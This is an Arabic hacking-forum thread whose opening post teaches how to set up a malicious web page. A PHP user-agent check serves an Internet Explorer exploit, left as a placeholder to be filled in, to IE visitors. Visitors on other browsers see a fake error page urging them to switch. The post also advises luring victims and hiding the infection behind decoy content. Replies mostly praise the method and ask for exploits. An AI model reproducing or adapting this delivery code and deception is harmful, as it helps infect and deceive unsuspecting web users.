'طريقة استغلال الثغرات تبع المتصفحات بالشكل الصحيح حتى مستخدمي جميع انواع المتصفحات راح ينخدعون

تم تحميل الصفحة في 1,1841336 ثانية
'طريقة استغلال الثغرات تبع المتصفحات بالشكل الصحيح حتى مستخدمي جميع انواع المتصفحات راح ينخدعون
الحالة
مغلق و غير مفتوح للمزيد من الردود.
إنضم
13 سبتمبر 2010
المشاركات
532
الإعجابات
90
النقاط
0
السلام عليكم ورحمة الله وبركاته

انا اشاهد بعض الاشخاص لما يقوم بالتغليم لصفحات تبع الاكسبلورر او المتصفحات الاخرة عن طريق الجافا ابلت او ثغرات الاكسبلورر

فانهم فقط يضعون الثغرة بدون مراعاة وحرصهم على ان يتم خداع الضحية او ان الضحية راح يكشفهم
ماعلينا ماراح اطول عليكم
اليوم راح اعطيكم طريقة لاستخدام الثغرات تبع المتصفحات بالشكل السليم
وراح نطبق على ثغرات الاكسبلورر
المهم
الطريقة هذه راح تخلي ضحيتك الي يستخدم متصفح الفاير فوكس او اي متصفح اخر غير الاكسبلورر يقوم باغلاقة وفتح صفحتك الملغومة عن طريق متصفح الاكسبلورر لكي يتم تشغيلها

المهم

المتطلبات
المتطلب الاول :
مساحة لترفع فيها صفحتك على ان تكون تدعم php

اعتقد المساحة موجودة وكمان لها اكثر من ميزات

انا حطيتها بهذا الموضوع
http://www.dev-point.com/vb/t169786.html
ادخل واحجز مساحة لكي ترفع الصفحة فيها

المهم

المتطلب الثاني :: ثغرة اكسبلورر لجميع الاصدارات تكون شغالة
اعتقد المواقع مليانة من هذه الثغرات

المتطلب الثالث ::
هذه الصفحة
انصحكم بتحميلها من الرابط الذي في الاخير عشان تكون كاملة والكمال لله
----------
لدينا هذا الكود تبع الصفحة الي راح تحملها انت من الرابط هذا
http://www.mediafire.com/?lcd782stmhq9chu


كود:
<?php
    $u_agent = $_SERVER['HTTP_USER_AGENT'];
    if(preg_match('/MSIE/i',$u_agent) && !preg_match('/Opera/i',$u_agent))
    {
        echo '
        
        
        
        حط هناء الثغرة
        
        
        
        
        
        ';
    }
    else
    {
    echo '
<html dir="rtl">
<body bgcolor="#E4E4E4">
<**************** ****************************************="Content-Language" content="en-us">
<**************** ****************************************="Content-Type" content="text/html; charset=windows-1256">
<title>خطاء ...</title>
</head>
<body>
<div align="center">
    <table cellpadding="0" cellspacing="0" width="791" bgcolor="#C0C0C0">
        <!-- MSTableType="layout" -->
        <tr>
            <td height="28" bgcolor="#000080">
            <p align="center"><b><font color="#FFFFFF"><span lang="ar-ye">خطاء 
            في فتح الصفحة</span>--Error </font></b></td>
        </tr>
        <tr>
            <td height="104" valign="top">
<p align="center">&nbsp;</p>
            <p align="center"><b><font color="#000080"><span lang="ar-ye">عفواً 
            تقنيات الموقع تدعم متصفح </span>Internet explorer<span lang="ar-ye">&nbsp; 
            التابع لشركة مايكرو سوفت ولا تدعم المتصفحات الأخرى<br>
            إذا أردت فتح الموقع الرجاء إن تستخدم متصفح </span>Internet explorer</font></b></p>
<p align="center"><b><font color="#000080">Sorry techniques site only supports 
Internet explorer browser, a subsidiary of Microsoft does not support other 
browsers if you want to open this ************site, please use&nbsp; Internet explorer 
browser </font></b></p>
            <p>&nbsp;</td>
        </tr>
        <tr>
            <td height="8" bgcolor="#000080">&nbsp;</td>
        </tr>
    </table>
</div>
</body>
</html>
    ';
    }
?>

شاهدو الكود السابق

انه يوجد به شروط لمعرفة نوع المتصفح


في حالة كان نوع المتصفح اكسبلورر سيتم تشغيل كود الثغرة ليشتغل الفيروس تبعك

وين تحط الثغرة تبعك
تحطها مكان السطر التالي
حط هناء الثغرة
طيب
اذا الضحية فتح الصفحة عن طريق متصفح اخر مثل اوبرا او موزيلا فاير فوكس او قوقل كروم .. الخ
كلنا نعرف ان هذه المتصفحات ماتشتغل معها ثغرات الاكسبلورر
عشان هذا
لو اجاء ضحية :27: وفتح الصفحة الملغومة عن طريق متصفح اخر مثل موزيلا او اوبرا او قوقل كروم .. الخ
راح تظهر له الشاشة التاليه :





وهذه الصفحة راح تخلي الضحية يقوم بفتح الصفحة عن طريق متصفح الاكسبلورر

وكله يعتمد على اغراءك للضحية وكلامك عن الموجود بالصفحة عشان تخليه يغير المتصفح بسرعة
وبهذا مبروووك عليك الضحية

وطبعاً انت ماراح تحط الثغرة لوحدة حط معها كود يظهر صورة او كود صفحة موقع او كود او كود اوكود ...الخ المهم مايشك فيك انك اخترقته .


لتجربة الصفحة

هذا الرابط
http://admin.oc.gs/

لاتخافو لم احط ثغرة في الرابط السابق فقط تجربة لمعرفة نوع المتصفح اذا فتحت باستخدام الاكسبلورر راح يظهر لك


حط الثغرة هنا

اما اذا فتحته بمتصفح اخر
راح يظهر لك مافي الصورة التالية :



ملاحظة :::

يمكنك استخدام ثغرة جافا ابلت بدل كود مطالبة الضحية باستخدام متصفح الاكسبلورر

ودعواتكم شباب

أذا استحقييت التقييم فقيمني :28:


اخوكم في الله أميرال النوفل

 
إنضم
30 يناير 2010
المشاركات
2,508
الإعجابات
471
النقاط
0
رد: 'طريقة استغلال الثغرات تبع المتصفحات بالشكل الصحيح حتى مستخدمي جميع انواع المتصفحات راح ينخدعون

مشكور أخي جاري التقيم
 
إنضم
13 سبتمبر 2010
المشاركات
532
الإعجابات
90
النقاط
0
رد: 'طريقة استغلال الثغرات تبع المتصفحات بالشكل الصحيح حتى مستخدمي جميع انواع المتصفحات راح ينخدعون

هلا فيك يالغالي
وشكل الشباب مافهمو الموضوع عشان هذا ما اشوف احد يرد
 
إنضم
16 أغسطس 2010
المشاركات
234
الإعجابات
17
النقاط
18
رد: 'طريقة استغلال الثغرات تبع المتصفحات بالشكل الصحيح حتى مستخدمي جميع انواع المتصفحات راح ينخدعون

بارك الله فيك فهمت الدرس مع اني لا افقه شيئا في الثغرات باركم الله فيك
 
إنضم
17 يونيو 2009
المشاركات
1,517
الإعجابات
215
النقاط
0
رد: 'طريقة استغلال الثغرات تبع المتصفحات بالشكل الصحيح حتى مستخدمي جميع انواع المتصفحات راح ينخدعون

الحقيقه موضوع غأيه بالابدآع

وأن دل ,, يدل على شخص مفكر ومطور وبحآث عن كل بديل وجديد

ما شاء الله عليك الحقيقه أعجبني تفكيرك وأهتمآمك بالاستهداف

أستمر يالغالي ولك احلا تقيم لك ولموضوعك

ولا يهمك عدد المهتمين بموضوعك فموضوعك كُتب للنخبه :9:


تقبل مروري :9:
 

madara1000

Beginner Developer
rank
إنضم
14 أغسطس 2010
المشاركات
74
الإعجابات
3
النقاط
0
رد: 'طريقة استغلال الثغرات تبع المتصفحات بالشكل الصحيح حتى مستخدمي جميع انواع المتصفحات راح ينخدعون

جميل
الله يعينك
 
إنضم
10 فبراير 2008
المشاركات
70
الإعجابات
11
النقاط
0
رد: 'طريقة استغلال الثغرات تبع المتصفحات بالشكل الصحيح حتى مستخدمي جميع انواع المتصفحات راح ينخدعون


ابدااع بمآ تعنييييييييييييييه الكلمــــــــــــه .. :13:


بس ، الثغررات حاليا ً .. بتظهر الشريط الأصفرر .. :16:


مآفيه ثغره تلقائيـه ..


بس بجدد أبداااااع ، خاصة ولو كان فيه ثغره فقط على الأكسـ ...


وربمآ قد يستطيع مبدعون الديف بوينت تطويرها لتصبح العكس :30:


اذا وجد شيء لمتصفح قوقل كروم أو غيره .. :29:


+


تحيآتي لك :28:
 
إنضم
15 أغسطس 2010
المشاركات
612
الإعجابات
59
النقاط
0
رد: 'طريقة استغلال الثغرات تبع المتصفحات بالشكل الصحيح حتى مستخدمي جميع انواع المتصفحات راح ينخدعون

ممكن اسئلك سؤال (( حد قالك انك مبدع ؟ ))
طيب انت مبدع بارك الله فيك
طبعا شرح واضح ومفهوم مش محتاج يعني
تم التقييم

تقبل تحياتي وتقبل مروري

 
إنضم
17 أغسطس 2010
المشاركات
32
الإعجابات
0
النقاط
0
رد: 'طريقة استغلال الثغرات تبع المتصفحات بالشكل الصحيح حتى مستخدمي جميع انواع المتصفحات راح ينخدعون

بارك الله فيك أخي
 
إنضم
12 سبتمبر 2010
المشاركات
1,148
الإعجابات
193
النقاط
0
العمر
30
الإقامة
S̲a̲u̲d̲i ̲A̲r̲a̲b̲i̲a̲
رد: 'طريقة استغلال الثغرات تبع المتصفحات بالشكل الصحيح حتى مستخدمي جميع انواع المتصفحات راح ينخدعون

موضوع رآئـ ع

من شخص اروع

لك احلا تقييم لمجهودك ~

:32:
 
إنضم
6 سبتمبر 2010
المشاركات
1,199
الإعجابات
24
النقاط
0
رد: 'طريقة استغلال الثغرات تبع المتصفحات بالشكل الصحيح حتى مستخدمي جميع انواع المتصفحات راح ينخدعون

شكرا لك على المعلومات القيمه
 

ip-13

Beginner Developer
rankrank
إنضم
26 أكتوبر 2009
المشاركات
491
الإعجابات
74
النقاط
0
رد: 'طريقة استغلال الثغرات تبع المتصفحات بالشكل الصحيح حتى مستخدمي جميع انواع المتصفحات راح ينخدعون

ثغرة اكسبلورر لجميع الاصدارات تكون شغالة
اعتقد المواقع مليانة من هذه الثغرات
:8::8::8::8:

اول شيء موضوع في قمة الابداع وصراحة جميلة الفكرة

:32::32:

بتمنى تطرح مواضيع من هذا القبيل


لكن زعلان منك على الكلام الي كاتبو فوق اعطينا الثغرات الي في منها كثير


تقبل مروري وتقيمي لانك تستاهل على هذه الفكرة

:32::32::32:
 
إنضم
13 سبتمبر 2010
المشاركات
532
الإعجابات
90
النقاط
0
رد: 'طريقة استغلال الثغرات تبع المتصفحات بالشكل الصحيح حتى مستخدمي جميع انواع المتصفحات راح ينخدعون

هلا فيكم شباب منورين يالغاليين


بنسبة لثغرات ياشباب مواقع الثغرات ملياانة كل الي عليك تاخذ اخر ثغرة نزلت وتجربها


 
إنضم
14 أغسطس 2010
المشاركات
604
الإعجابات
291
النقاط
63
رد: 'طريقة استغلال الثغرات تبع المتصفحات بالشكل الصحيح حتى مستخدمي جميع انواع المتصفحات راح ينخدعون

ما شاء الله عليك
ما شاء الله
 
إنضم
16 نوفمبر 2009
المشاركات
352
الإعجابات
4
النقاط
0
رد: 'طريقة استغلال الثغرات تبع المتصفحات بالشكل الصحيح حتى مستخدمي جميع انواع المتصفحات راح ينخدعون

اخوي انت مبدع وشرحك واضح وابداع

لكن كمل معروفك ونزل لنا ثغره لبى روحك

لك احلى تقييم
 
إنضم
11 مارس 2011
المشاركات
13
الإعجابات
1
النقاط
0
رد: 'طريقة استغلال الثغرات تبع المتصفحات بالشكل الصحيح حتى مستخدمي جميع انواع المتصفحات راح ينخدعون

قوة :10::10::10::10::6:
 

wsm

Beginner Developer
rank
إنضم
20 أغسطس 2010
المشاركات
104
الإعجابات
18
النقاط
18
رد: 'طريقة استغلال الثغرات تبع المتصفحات بالشكل الصحيح حتى مستخدمي جميع انواع المتصفحات راح ينخدعون

ليس غريبا عليك الابداع فأنت منبعه

متابع لكتاباتك في عدة مواقع

ومن المعجبين ببرامجك الرائعه

,,,,,,
الثغرات التي يتم طرحها في المنتديات غير تلقائيه
 

mstr-lonley

Beginner Developer
rank
إنضم
9 مارس 2011
المشاركات
34
الإعجابات
0
النقاط
0
رد: 'طريقة استغلال الثغرات تبع المتصفحات بالشكل الصحيح حتى مستخدمي جميع انواع المتصفحات راح ينخدعون

:30: ما فهمت ولا شي
يعني الصفحه احط باتش وارفعها ولا كيف ؟!
يالغلاَ ابي مساعدتك
اميلي المتواظع < خخ
:30:
[email protected]:30:
 

Toolz

Active DeveloPer
rankrankrank
إنضم
9 مارس 2011
المشاركات
594
الإعجابات
61
النقاط
28
رد: 'طريقة استغلال الثغرات تبع المتصفحات بالشكل الصحيح حتى مستخدمي جميع انواع المتصفحات راح ينخدعون

بارك الله فيك​
 

OVER DOSE

Beginner Developer
rank
إنضم
9 مارس 2011
المشاركات
11
الإعجابات
0
النقاط
0
العمر
26
رد: 'طريقة استغلال الثغرات تبع المتصفحات بالشكل الصحيح حتى مستخدمي جميع انواع المتصفحات راح ينخدعون

بارك الله فيك
:6::6::6::6::6::6::6:
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل